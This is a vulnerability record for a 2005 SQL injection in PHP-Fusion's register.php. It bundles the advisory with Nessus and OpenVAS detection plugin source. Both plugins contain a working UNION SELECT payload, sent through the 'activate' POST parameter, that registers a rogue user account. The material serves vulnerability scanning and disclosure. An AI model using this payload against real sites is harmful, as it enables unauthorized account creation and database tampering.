ID OSVDB:19866 Type osvdb Reporter Andreas Sandblad(as@secunia.com) Modified 2005-10-06T04:45:44
Description
Vulnerability Description
PHP-Fusion contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'register.php' script not properly sanitizing user-supplied input to the 'activate' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.
Technical Description
This vulnerability is only present when the magic_quotes_gpc PHP option is 'off'.
Solution Description
Upgrade to version 6.00.110 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.
Short Description
PHP-Fusion contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'register.php' script not properly sanitizing user-supplied input to the 'activate' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.
References:
Vendor URL: http://www.php-fusion.co.uk/
Security Tracker: 1015013
Secunia Advisory ID:17055Related OSVDB ID: 19867
Other Advisory URL: http://secunia.com/secunia_research/2005-52/advisory/
Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0130.html
ISS X-Force ID: 22532
CVE-2005-3161
Bugtraq ID: 15018
{"enchantments": {"score": {"value": 6.9, "vector": "NONE", "modified": "2017-04-28T13:20:16"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-3161"]}, {"type": "nessus", "idList": ["PHP_FUSION_6_00_110.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231020009"]}], "modified": "2017-04-28T13:20:16"}, "vulnersScore": 6.9}, "bulletinFamily": "software", "affectedSoftware": [{"name": "PHP-Fusion", "operator": "eq", "version": "6.00.109"}], "references": [], "href": "https://vulners.com/osvdb/OSVDB:19866", "id": "OSVDB:19866", "title": "PHP-Fusion register.php activate Variable SQL Injection", "history": [], "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "lastseen": "2017-04-28T13:20:16", "edition": 1, "hash": "bdc5fdcef218d0d722c2bac71086a1fc80babd569ae0f4691c29459f74c92980", "objectVersion": "1.2", "reporter": "Andreas Sandblad(as@secunia.com)", "description": "## Vulnerability Description\nPHP-Fusion contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'register.php' script not properly sanitizing user-supplied input to the 'activate' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Technical Description\nThis vulnerability is only present when the magic_quotes_gpc PHP option is 'off'.\n## Solution Description\nUpgrade to version 6.00.110 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nPHP-Fusion contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'register.php' script not properly sanitizing user-supplied input to the 'activate' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## References:\nVendor URL: http://www.php-fusion.co.uk/\nSecurity Tracker: 1015013\n[Secunia Advisory ID:17055](https://secuniaresearch.flexerasoftware.com/advisories/17055/)\n[Related OSVDB ID: 19867](https://vulners.com/osvdb/OSVDB:19867)\nOther Advisory URL: http://secunia.com/secunia_research/2005-52/advisory/\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0130.html\nISS X-Force ID: 22532\n[CVE-2005-3161](https://vulners.com/cve/CVE-2005-3161)\nBugtraq ID: 15018\n", "modified": "2005-10-06T04:45:44", "viewCount": 1, "published": "2005-10-06T04:45:44", "cvelist": ["CVE-2005-3161"], "hashmap": [{"key": "affectedSoftware", "hash": "9048a6a85cdf1383d8d80d57dd431752"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "d1dd9b0b6cadcfcc3f7b6f89fe806641"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "99bc16e62c3b2eb16a973c9c69c276b8"}, {"key": "href", "hash": "b9bbe50f454f6f3a646683c59a65a671"}, {"key": "modified", "hash": "5e20594211df0451c757573f4f8f629b"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "5e20594211df0451c757573f4f8f629b"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "4c34e35a4f9c924323262b776e30699c"}, {"key": "title", "hash": "87c691e541b7e0e000311855b469e2da"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}]}
{"cve": [{"lastseen": "2019-05-29T18:08:15", "bulletinFamily": "NVD", "description": "Multiple SQL injection vulnerabilities in PHP-Fusion before 6.00.110 allow remote attackers to execute arbitrary SQL commands via (1) the activate parameter in register.php and (2) the cat_id parameter in faq.php.", "modified": "2017-07-11T01:33:00", "id": "CVE-2005-3161", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3161", "published": "2005-10-06T10:02:00", "title": "CVE-2005-3161", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2019-11-01T03:20:02", "bulletinFamily": "scanner", "description": "The remote version of this software is vulnerable to multiple SQL\ninjection attacks due to its failure to properly sanitize certain\nparameters. Provided PHP", "modified": "2019-11-02T00:00:00", "id": "PHP_FUSION_6_00_110.NASL", "href": "https://www.tenable.com/plugins/nessus/20009", "published": "2005-10-12T00:00:00", "title": "PHP-Fusion < 6.00.110 Multiple Scripts SQL Injection", "type": "nessus", "sourceData": "#\n# Josh Zlatin-Amishav (josh at ramat dot cc)\n# GPLv2\n#\n\ninclude(\"compat.inc\");\n\nif (description) {\n script_id(20009);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/11/15 20:50:18\");\n\n script_cve_id(\n \"CVE-2005-3157\",\n \"CVE-2005-3158\",\n \"CVE-2005-3160\",\n \"CVE-2005-3161\"\n );\n script_bugtraq_id(\n 14964,\n 14992,\n 15005,\n 15018\n );\n\n script_name(english:\"PHP-Fusion < 6.00.110 Multiple Scripts SQL Injection\");\n script_summary(english:\"Checks for SQL injection in PHP-Fusion's register.php\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains several PHP scripts that are vulnerable to\nSQL injection flaws.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote version of this software is vulnerable to multiple SQL\ninjection attacks due to its failure to properly sanitize certain\nparameters. Provided PHP's 'magic_quotes_gpc' setting is disabled,\nthese flaws allow an attacker to manipulate database queries, which\nmay result in the disclosure or modification of data.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2005/Oct/51\");\n script_set_attribute(attribute:\"see_also\", value:\"https://secuniaresearch.flexerasoftware.com/secunia_research/2005-52/advisory\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to at least version 6.00.110 of PHP-Fusion.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/10/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/07/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/05\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php_fusion:php_fusion\");\n script_end_attributes();\n\n script_category(ACT_MIXED_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"(C) 2005-2018 Josh Zlatin-Amishav\");\n\n script_dependencies(\"php_fusion_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/php_fusion\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"url_func.inc\");\n\n\nport = get_http_port(default:80);\nif (!get_port_state(port)) exit(0);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Test an install.\ninstall = get_kb_item_or_exit(string(\"www/\", port, \"/php_fusion\"));\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n ver = matches[1];\n dir = matches[2];\n\n if (!safe_checks()) {\n # Make sure 'register.php' exists -- it's used in the exploit.\n req = http_get(item:string(dir, \"/register.php\"), port:port);\n res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);\n if (res == NULL) exit(0);\n\n # If it does...\n if (\"<form name='inputform' method='post' action='register.php'\" >< res) {\n # Try to exploit the flaw to register a user.\n user = rand_str(charset:\"abcdefghijklmnopqrstuvwxyz0123456789_\");\n pass = rand_str();\n email = string(user, \"@\", get_host_name());\n sploit = string(\n \"UNION SELECT \",\n '\"\",',\n '\"\",',\n '0,',\n \"'a:4:{\",\n 's:9:\"user_name\";s:', strlen(user), ':\"', user, '\";',\n 's:13:\"user_password\";s:', strlen(pass), ':\"', pass, '\";',\n 's:10:\"user_email\";s:', strlen(email), ':\"', email, '\";',\n 's:15:\"user_hide_email\";s:1:\"1\";',\n \"}\"\n );\n #\n # nb: the code sanitizes GETs so we can't use that.\n postdata = string(\"activate=\", rand_str(), \"'+\", urlencode(str:sploit));\n req = string(\n \"POST \", dir, \"/register.php?plugin=\", SCRIPT_NAME, \" HTTP/1.1\\r\\n\",\n \"Host: \", get_host_name(), \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\",\n postdata\n );\n res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);\n if (res == NULL) exit(0);\n\n if ( \"Your account has been verified.\" >< res)\n {\n if (report_verbosity > 0) {\n report = string(\n \"\\n\",\n \"Nessus has successfully exploited one of the flaws by adding\\n\",\n \"the user '\", user, \"' to PHP-Fusion on the remote host.\\n\"\n );\n security_warning(port:port, extra:report);\n }\n else\n security_warning(port:port);\n\n\tset_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n exit(0);\n }\n }\n }\n\n # Check the version number in case registrations are disabled or safe checks are enabled.\n if (ver =~ \"^([0-5][.,]|6[.,]00[.,](0|10[0-9]))\") {\n report =\n\"***** Nessus has determined the vulnerability exists on the remote\n***** host simply by looking at the version number of PHP-Fusion\n***** installed there.\";\n security_warning(port:port, extra:report);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:31:57", "bulletinFamily": "scanner", "description": "The remote version of PHP-Fusion is vulnerable to multiple SQL\n injection attacks due to its failure to properly sanitize certain parameters.", "modified": "2018-10-29T00:00:00", "published": "2006-03-26T00:00:00", "id": "OPENVAS:136141256231020009", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231020009", "title": "PHP-Fusion < 6.00.110 Multiple SQL Injection Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: php_fusion_6_00_110.nasl 12150 2018-10-29 11:46:42Z cfischer $\n#\n# PHP-Fusion < 6.00.110 Multiple SQL Injection Vulnerabilities\n#\n# Authors:\n# Josh Zlatin-Amishav (josh at ramat dot cc)\n#\n# Copyright:\n# Copyright (C) 2005 Josh Zlatin-Amishav\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php-fusion:php-fusion\";\n\n# Updated: 04/07/2009\n# Antu Sanadi <santu@secpod.com>\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.20009\");\n script_version(\"$Revision: 12150 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-29 12:46:42 +0100 (Mon, 29 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2006-03-26 17:55:15 +0200 (Sun, 26 Mar 2006)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2005-3157\", \"CVE-2005-3158\", \"CVE-2005-3160\", \"CVE-2005-3161\");\n script_bugtraq_id(14964, 14992, 15005, 15018);\n script_name(\"PHP-Fusion < 6.00.110 Multiple SQL Injection Vulnerabilities\");\n script_category(ACT_MIXED_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"(C) 2005 Josh Zlatin-Amishav\");\n script_dependencies(\"secpod_php_fusion_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"php-fusion/installed\");\n\n script_xref(name:\"URL\", value:\"http://securityfocus.org/archive/1/411909\");\n script_xref(name:\"URL\", value:\"http://archives.neohapsis.com/archives/secunia/2005-q4/0021.html\");\n\n script_tag(name:\"solution\", value:\"Update to at least version 6.00.110 of PHP-Fusion.\");\n\n script_tag(name:\"summary\", value:\"The remote version of PHP-Fusion is vulnerable to multiple SQL\n injection attacks due to its failure to properly sanitize certain parameters.\");\n\n script_tag(name:\"impact\", value:\"Provided PHP's 'magic_quotes_gpc' setting is disabled, these flaws\n allow an attacker to manipulate database queries, which may result in the disclosure or\n modification of data.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"url_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( cpe:CPE, port:port, exit_no_version:FALSE ) ) exit( 0 );\nver = infos['version'];\ndir = infos['location'];\n\nif( ! safe_checks() ) {\n\n vtstrings = get_vt_strings();\n if( dir == \"/\" ) dir = \"\";\n\n user = rand_str(charset:\"abcdefghijklmnopqrstuvwxyz0123456789_\");\n pass = rand_str();\n email = string(user, \"@\", get_host_name());\n sploit = string(\"UNION SELECT \",'\"\",', '\"\",', '0,',\"'a:4:{\",\n 's:9:\"user_name\";s:', strlen(user), ':\"', user, '\";',\n 's:13:\"user_password\";s:', strlen(pass), ':\"', pass, '\";',\n 's:10:\"user_email\";s:', strlen(email), ':\"', email, '\";',\n 's:15:\"user_hide_email\";s:1:\"1\";',\n \"}\");\n\n postdata = string(\"activate=\", rand_str(), \"'+\", urlencode(str:sploit));\n url = dir + \"/register.php?plugin=\" + vtstrings[\"lowercase\"];\n req = http_post(item:url, port:port, data:postdata);\n res = http_keepalive_send_recv( port:port, data:req, bodyonly:TRUE );\n if( !res ) exit( 0 );\n\n if( \"Your account has been verified.\" >< res ) {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nif( version_is_less_equal( version:ver, test_version:\"6.00.100\" ) ) {\n report = report_fixed_ver( installed_version:ver, fixed_version:\"6.00.110\" );\n security_message( port:port, data:report );\n}\n\nexit( 0 );", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
